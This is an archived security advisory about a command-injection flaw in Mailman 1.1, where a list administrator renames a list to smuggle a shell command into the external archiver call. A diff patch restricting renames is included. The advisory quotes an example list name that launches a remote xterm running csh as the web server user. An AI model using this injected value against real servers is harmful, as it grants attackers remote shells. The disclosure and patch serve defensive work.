Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: mailman3.htm

Mailman execute arbitrary code



    Mailman 1.1 and prior with external archiving enabled


    Christopher P. Lindsey found following.  Mailman from
    is a  mailing list  manager with  strong Web  functionality.  If a
    site is running Mailman  1.1 with an external  archiving mechanism
    that uses the internal variable %(listname)s, list  administrators
    can run any command with the Webserver's uid/gid.

    This bug was  reported to the  developers in late  November, 1999,
    and was  fixed in  the CVS  source tree.   Newer beta  versions of
    Mailman  are  not  susceptible,  yet  it  has  recently  come   to
    attention that the vulnerable 1.1 package is still available as  a
    stable, non-beta release on the Mailman site(s).

    Mailman has  a mechanism  that allows  messages sent  to a mailing
    list  to   be  pumped   into  some   sort  of   external  program.
    Traditionally this involves some  sort of Web-based archiver  like
    MHonArc  or  hypermail.   To  make  the  archiving  more powerful,
    macros  can  be  used  based  on  internal  Mailman  values.   For
    example, list archives can be saved on a per list basis with  this
    line in $prefix/Mailman/

        PUBLIC_EXTERNAL_ARCHIVER  = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'

    The problem  comes from  the %(listname)s  expansion.   Since it's
    derived from a value  that can be set  on a per list  basis by the
    list administrator, it's  subject to tampering.   Consider a  list
    who's name was changed to

        /usr/X11R6/bin/xterm -display -e /bin/csh

    by a list administrator.  As soon as a message is sent to the list
    this command will be executed, opening a remote xterm with a shell
    running with the Web server's  uid/gid.  Any command available  to
    the Web server can be executed in this fashion.

    Other    variable    names    can    be    accessed    if     your
    PUBLIC_EXTERNAL_ARCHIVER  definition  is  configured  to use them.
    The  patch  below  will   only  fix  problems  with   %(listname)s


    Upgrade to  a later  version of  Mailman, or  install the supplied

    This  patch  was  provided  my  the  Mailman  developers and later
    cleaned up to work against a stock 1.1 distribution.  It works  by
    only allowing listowners to change case values within the name  of
    their list.  Obviously a better long-term solution that  sanitizes
    system calls, etc. should be considered.

    ***        Mon Mar 13 21:03:53 2000
    ---    Mon Mar 13 21:04:51 2000
    *** 784,789 ****
    --- 784,800 ----
                      val = cgi_info[property].value
                  value = GetValidValue(lst, property, kind, val, deps)
                  if getattr(lst, property) != value:
    +                 # TBD: Ensure that lst.real_name differs only in letter
    +                 # case.  Otherwise a security hole can potentially be opened
    +                 # when using an external archiver.  This seems ad-hoc and
    +                 # could use a more general security policy.
    +                 if property == 'real_name' and \
    +                    string.lower(value) <> string.lower(lst._internal_name):
    +                     # then don't install this value.
    +                     document.AddItem("""<p><b>real_name</b> attribute not
    +                     changed!  It must differ from the list's name by case
    +                     only.<p>""")
    +                     continue
                      setattr(lst, property, value)
                      dirty = 1

    For FreeBSD:

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH